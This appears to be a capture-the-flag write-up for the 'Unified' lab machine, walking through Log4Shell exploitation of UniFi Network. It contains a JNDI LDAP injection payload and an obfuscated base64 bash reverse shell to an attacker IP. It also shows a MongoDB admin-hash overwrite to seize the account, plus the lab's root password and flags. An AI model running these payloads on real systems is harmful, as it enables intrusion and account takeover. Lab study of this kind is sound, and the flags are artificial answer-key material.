Article directory
Target drone: Unified
Task1
Question: What are the first four open ports?
22,6789,8080,8443
Scan with nmap
Task2
Question: What is the title of the software running on port 8443?
UniFi Network
Scan again with nmap
nmap -sV -v -sC -p 8443 --min-rate 1000 10.129.96.149
Task3
Question: What version of the software is running?
6.4.54
We can know from the nmap scan results that there is http service on port 8080
Visit to get the version
Task4
Question: What is the CVE of the identified vulnerability?
CVE-2021-44228
Just go online and search for vulnerabilities in this version.
5-14Problem solving process
It is found that there is a log4j vulnerability. We capture the packet/api/login
and construct the statement
to verify whether the payload exists in the Log4j vulnerability
{
"username":"1",
"password":"1",
"remember":"${jndi:ldap://10.10.14.212/whatever}",
"strict":true
}
LDAP Lightweight Directory Access Protocol, default port 389, if there is a vulnerability to send a payload message, the data message will be sent to the local 389 end
Let’s set up a monitor
sudo tcpdump -i tun0 port 389
Note: tcpdump is a program of wireshark that can intercept
It can be found that the interception is successful, indicating that the target host accesses the local ldap port through port 37900
The tool preparation is as follows
准备工具:
openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y
Maven
sudo apt-get install maven -y
编译maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
//这里要换成阿里云的源,不然下载速度很慢
mvn package
Then prepare to rebound the shell
Execute the following command
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTIvMTAyOCAwPiYxJw==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.212"
Then start monitoring and send bp
Rebound shell successfully
Then find the user's flag first
Check the mongdb port status
ps aux | grep mongo
bin/mongod in the query results --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/ unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1 is the path and parameters of the running command or executable file, indicating that the port is 27117
Try to read the administrator password, the default database ace of the UniFi program, and query the data of the admin table
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
Note: Parameter –eval
Discover the encrypted information of the administrator's account information and password
x_shadow is the password hash, and the SHA-512 algorithm uses a code beginning with 6 6 < /span>Hash the 16-character string salt starting with 6
以$6$开头的,表明是用SHA-512加密的;
以$1$开头的,表明是用MD5加密的;
以$2$开头的,表明是用Blowfish加密的;
以$5$开头的,表明是用 SHA-256加密的。星号代表帐号被锁定
ps:是在linux shadow文件才这么表示
Of course, you can directly use the tool hashid to decrypt the encryption method and find that it is sha512
Because it is a hash function, it cannot be cracked, so you can only use the replacement method
Replace the administrator key in mongdb, encrypt admin as follows
Use the syntax of nosql, update as follows
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$jaYBW0iCZNXzIuZk$FtGH/we0.hTsf63jTv6fh3sgcPP/J0uIXKXp0ADNWelcqW0ykcTiwnkvI.YePmnRpYMKZ24cqsSCxxg2RtBBs1"}})'
Then you can take a look and you will find that the key has been changed to the admin we set up
We log in directly, and in the settings we find that ssh connection is allowed and we know the root password a>
ssh connection successful
Continue to get the root flag
Task5
Question: What protocol does JNDI utilize in injection?
ldap
Task6
Question: What tools do we use to intercept traffic, indicating a successful attack?
tcpdump
Task7
Question: Which port do we need to intercept traffic transmission?
389
Task8
Question: On which port is the MongoDB service running?
27117
Task9
Question: What is the default database name for UniFi applications?
ace
Task 10
Question: In MongoDB, what is the function we use to enumerate the users in the database?
db.admin.find()
Task11
Question: In MongoDB, what is the function we use to update a user in the database?
db.admin.update()
Task12
Question: root password
NotACrackablePassword4U2022
Submit user flag
6ced1a6a89e666c0620cdb10262ba127
Submit root flag
e50bc93c75b634e4b272d2f771c33681